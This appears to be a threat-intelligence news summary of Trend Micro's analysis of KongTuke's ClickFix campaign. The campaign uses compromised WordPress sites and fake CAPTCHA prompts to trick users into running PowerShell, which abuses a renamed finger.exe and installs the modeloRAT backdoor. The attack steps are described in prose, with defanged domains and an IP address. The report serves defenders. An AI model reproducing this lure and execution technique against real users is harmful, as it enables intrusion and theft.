KongTuke Continues ClickFix Campaign via Compromised WordPress Sites to Deliver modeloRAT
Trend Micro MDR analysis reveals KongTuke still uses compromised WordPress sites and fake CAPTCHA lures to deliver modeloRAT, leveraging legitimate Windows tools for stealth.
Trend Micro's Managed Detection and Response (MDR) team has uncovered ongoing attacks by the threat group KongTuke, which continues to compromise legitimate WordPress websites and use fake CAPTCHA prompts to deliver the Python-based modeloRAT malware. The attackers inject malicious JavaScript into trusted sites, tricking users into running a PowerShell command that initiates a multi-stage infection chain. This technique, known as ClickFix, remains active alongside the group's newer CrashFix method, which uses a fake browser extension instead.
The infection chain begins when a user visits a compromised WordPress site. The injected JavaScript sets a cookie, queries Cloudflare for trace information, and sends the user's browser and OS details to a remote server. The server then returns arbitrary content via document.write(), which in this case displays a fake CAPTCHA page instructing the user to copy and run a PowerShell command. Trend Micro's forensic analysis of a victim's browser history showed a search for "florida 2025 IDTF facility" leading to a legitimate WordPress site that had been injected with malicious scripts from domains like ainttby[.]com and ctpsih[.]com.
Once the user executes the PowerShell command, the malware copies the legitimate Windows tool finger.exe to a temporary file (ct.exe) and runs it. The renamed binary connects to an external IP address (45.61.138[.]224) and pipes the response directly into the command interpreter, enabling remote command execution. This abuse of built-in system tools and trusted services like Dropbox for file hosting helps the malware evade detection while maintaining persistence on compromised systems.
modeloRAT is a Python-based backdoor that performs reconnaissance, command execution, and maintains persistent access. The malware specifically checks whether the infected system is part of a corporate domain and identifies installed security tools before proceeding, indicating a focus on enterprise environments rather than opportunistic infections. Trend Micro's analysis confirms that the PowerShell command observed in this case exactly matches a January 2026 finding describing the same infection chain.
Recent VirusTotal submissions show numerous WordPress sites injected with similar scripts, demonstrating that this delivery vector remains active and scalable. While the domains used in this specific attack are now inactive, visiting the compromised website revealed another injected script hosted at foodgefy[.]com. The infrastructure characteristics, including naming conventions and ASN overlaps, align with previously documented KongTuke activity from April 2025.
Organizations whose users browse compromised websites or encounter prompts asking them to run commands could be at risk. Trend Micro recommends that enterprises implement web filtering, user awareness training, and endpoint detection rules to block the execution of suspicious PowerShell commands. The continued evolution of KongTuke's tactics, from ClickFix to CrashFix, highlights the need for layered defenses against social engineering attacks that abuse legitimate system tools.